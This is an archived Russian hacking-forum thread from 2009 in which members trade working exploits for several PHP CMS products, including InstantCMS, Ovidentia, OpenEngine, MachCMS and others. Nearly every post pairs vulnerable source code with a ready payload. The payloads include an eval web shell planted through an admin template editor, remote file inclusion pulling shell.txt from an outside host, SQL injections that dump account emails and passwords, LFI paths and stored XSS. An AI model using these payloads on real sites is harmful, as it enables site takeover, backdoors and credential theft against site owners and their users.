ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.12.2009, 16:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
в дополнение к классной статье Spyder в ноябрьском ][:
InstantCMS v1.5.2
В статье описывается, как залить шелл через встроенный дампер БД в админке, есть еще способ:
- редактирование файла ../templates/_default_/template.php прямо в админке:
Слева снизу - изменить настроки->дизайн->выбираем шаблон->Редактировать PHP
вписываем свой код:
if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd]));
и по ссылке http://site.ru/index.php?cmd=phpinfo(); получаем практически готовый шелл
|
|
|
09.12.2009, 17:05
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Ovidentia CMS
Author: http://Ovidentia.org
Version: 6.x.x <= 7.1.7
RFI
Need: register_globals = ON allow_url_include = ON
file: /ovidentia/selector.php
PHP код:
require_once $GLOBALS['babInstallPath'] . 'utilit/uiutil.php';
require_once $GLOBALS['babInstallPath'] . 'utilit/tree.php';
target: ?babInstallPath=http://site.com/shell.txt%00
or
?babInstallPath=../../localfile.php%00
file: /ovidentia/statfaq.php
PHP код:
include_once $babInstallPath.'utilit/statutil.php';
include_once $babInstallPath.'utilit/uiutil.php';
target: ?babInstallPath=http://site.com/shell.txt%00
or
?babInstallPath=../../localfile.php%00
Выполнение произвольного кода!
Если allow_url_include = ON, то делаем запрос вида:
target: data:,<?php eval($_REQUEST[cmd]); ?>&cmd=phpinfo();
На выходе phpinfo();
Спасибо Ctacok
Последний раз редактировалось m0Hze; 11.12.2009 в 14:47..
|
|
|
|
10.12.2009, 21:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
mForum
Активная XSS:
1. Создаём топик с [IMG]javascript :alert()[/IMG]
2. usercp.php?mode=edit_profile : Image link = javascript :alert()
Код:
PHP код:
if ($_POST[avatar2] != "" AND $_POST[deleteavatar] == "") {
#THIRDIF#
$len = strlen($_POST[avatar2]) - 4;
$check_ext = substr($_POST[avatar2],$len,strlen($_POST[avatar2]));
if ($check_ext != ".gif" AND $check_ext != ".jpg")
profile_error("$lang[138]");
$_POST[avatar2] = str_replace(">", "", $_POST[avatar2]);
$_POST[avatar2] = str_replace("<", "", $_POST[avatar2]);
$_POST[avatar2] = str_replace("\"", "", $_POST[avatar2]);
if (strlen($_POST[avatar2]) > 200 OR strlen($_POST[avatar2]) < 7)
profile_error("$lang[140]");
$query_av = "UPDATE $table_users SET avatar=\"$_POST[avatar2]\" WHERE id=\"$_SESSION[user_id]\" LIMIT 1";
if (mysql_query($query_av,$db))
print "<li>$lang[141]</li>";
#THIRDIF#
}
3. post.php?mode=pvt [IMG]javascript :alert()[/IMG]
|
|
|
|
11.12.2009, 01:54
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Opus CMS
Author: http://opus.cx/
Version: 2.28
Blind-SQL
Во всех файлах админки, присутствует ф-ция check_author_cookie();, которая проверяет админ вы или нет,и если нет - exit();. Но в этом файле ее воткнули после кода,а не сначала его-же.Поэтому есть возможность поковыряться в бд ведь и про фильтрацию они тоже забыли.
file: /adm/backup.php
PHP код:
if ( isset($_GET["email"]) )
{
if ( $vp_author = mysql_fetch_array(mysql_db_query(VPUMP_DATABASE, "select * from vp_author where email = '".@$_GET["email"]."' and password = '".@$_GET["password"]."'")) )
target: 7 columns in table.
|
|
|
|
11.12.2009, 02:14
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: x3CMS
Author: http://www.x3cms.net/
Version: 0.3.2.1
LFI
file: page.php
PHP код:
$p = explode('/', $_REQUEST['pp']);
$a = array_shift($p);
...
$d = (isset($_REQUEST['d'])) ? $_REQUEST['d'] : ''; // addon
...
$aa = array_shift($p);
if (empty($d)) {
include './engine/'.$aa;
}
else if ($aa != 'install') {
include './add-on/'.$d.'/engine/'.$aa;
}
else {
include './add-on/'.$d.'/install.php';
}
target: ?pp=engine&d=../../lfi.php%00
|
|
|
|
11.12.2009, 02:26
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Bmachine
Author: http://boastology.com/
Version: 3.1
SQL-inj
file: login.php
PHP код:
$user=$db->query("SELECT user_login,last_login,user_pass,level FROM ".MY_PRF."users WHERE user_login='{$_POST['user_login']}'", false);
target: {POST} ?login=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23/*
|
|
|
|
11.12.2009, 02:38
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: OpenEngine
Author: http://www.openengine.de/html/pages/de/index.htm
Version: 1.9.1
SQL-inj
/* нужны права администратора */
file: system/03_admin/ajax/index.php
PHP код:
$page_path_new = $_POST["path"];
$query = "SELECT * FROM ".$db_praefix."page WHERE page_path = '$page_path_new'";
$result = mysql_query($query);
echo mysql_num_rows($result);
target: {POST} ?path=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,3,40,41,42,43,44,45,46/*
|
|
|
|
MachCMS 1.0 Local File Inclusion |
11.12.2009, 15:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
MachCMS 1.0 Local File Inclusion
MachCMS 1.0
Web site : http://machcms.sourceforge.net
Version : 1.0
Author : Arthur Wiebe
[Local File Inclusion]
Vuln file: classes/Template.php [str:61]
PHP код:
if (file_exists("pages/$page.page/main.php")) {
$template = $this;
require_once("pages/$page.page/main.php");
$this->parse();
}
Exploit:
if magic_quotes = OFF
Код:
http://[host]/[path]/index.php?q=../../../../../../../../[local_file]%00
© RulleR aka Pin4eG
Последний раз редактировалось RulleR; 11.12.2009 в 15:09..
|
|
|
|
11.12.2009, 19:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Сообщение от m0Hze
Product: OpenEngine
Author: http://www.openengine.de/html/pages/de/index.htm
Version: 1.9.1
SQL-inj
/* нужны права администратора */
file: system/03_admin/ajax/index.php
PHP код:
$page_path_new = $_POST["path"];
$query = "SELECT * FROM ".$db_praefix."page WHERE page_path = '$page_path_new'";
$result = mysql_query($query);
echo mysql_num_rows($result);
target: {POST} ?path=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,3,40,41,42,43,44,45,46/*
system/02_page/includes/admin.php [str:368]
PHP код:
$query = "SELECT * FROM ".$db_praefix."page WHERE (page_path = '$page_path') AND (page_status <= ".$account_status.") $access";
$result = mysql_query($query);
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,null,null,null ,null,null,null,null,null,null,concat_ws(0x3a,acco unt_email,account_password),null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null+from+oe_acco unt+where+account_group=2+--+
------------------------------------------------------------------------
*вывод в title
Интересная инъекция, далее показано что еще можно из нее выжать (:
LFI
Vuln file: system/02_page/includes/lang.php [str:48]
PHP код:
$query = "SELECT lang_short from ".$db_praefix."language order by lang_short";
$result = mysql_query($query);
closeDB($link);
while ($row = mysql_fetch_array($result))
{
$lang_list .= $row["lang_short"].",";
}
if (strlen($lang_list) > 0)
{
$lang_list = substr($lang_list,0,strlen($lang_list)-1);
}
if (isset($_GET["admin"]))
{
include("system/00_settings/language_packs/lang_".$lang_admin.".php");
}
else
{
include("system/00_settings/language_packs/lang_".$lang_input.".php");
}
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,'/../../../../../[local_file]%00',null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null+--+
------------------------------------------------------------------------
Чтение произвольных файлов
Vuln file: system/02_page/start.php [str:52]
PHP код:
$fp = fopen($incurl.$page["page_include"], "r");
if ($fp)
{
while(!feof($fp))
{
$content .= fread($fp,"10000");
}
fclose($fp);
}
echo $content;
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,'../../../[local_file]',null,null,null,null,null,null,null+--+
------------------------------------------------------------------------
Для успешной эксплуатации необходимо:
magic quotes = OFF
Последний раз редактировалось RulleR; 11.12.2009 в 19:08..
|
|
|
|
11.12.2009, 19:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Сообщение от m0Hze
Извини что не множно подпорчу работу твою,но LFI в том файле нет.Ну точнее есть,но оно невозможно.Ибо:
closeDB($link); - выдаст ошибку,как Ундефинид функцион и скрипт прекращает свою работу.
смотрим фаил website.php
PHP код:
define("_ISLOADED",1);
if (file_exists("_config/config.php"))
{
require("_config/config.php");
}
else
{
die("openEngine ERROR: Choose <a href='system/setup/index.php'>Installation</a> or check your current system");
}
require("system/00_settings/start.php");
if ($site_encoding != "noencoding")
{
header('content-type: text/html; charset='.$site_encoding);
}
require("system/01_user/start.php");
require("system/02_page/start.php");
if (isAdmin())
{
require("system/03_admin/start.php");
}
require("system/00_settings/end.php");
?>
видим что инклудится фаил system/00_settings/ start.php, смотрим start.php:
PHP код:
require("system/00_settings/includes/database.php");
require("system/00_settings/includes/settings.php");
смотрим database.php:
PHP код:
function closeDB($link)
{
mysql_close($link);
}
и почему closeDB() будет ундефинид функцион? 
ты бы проверил на локалхосте, все прекрасно инклудится...
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид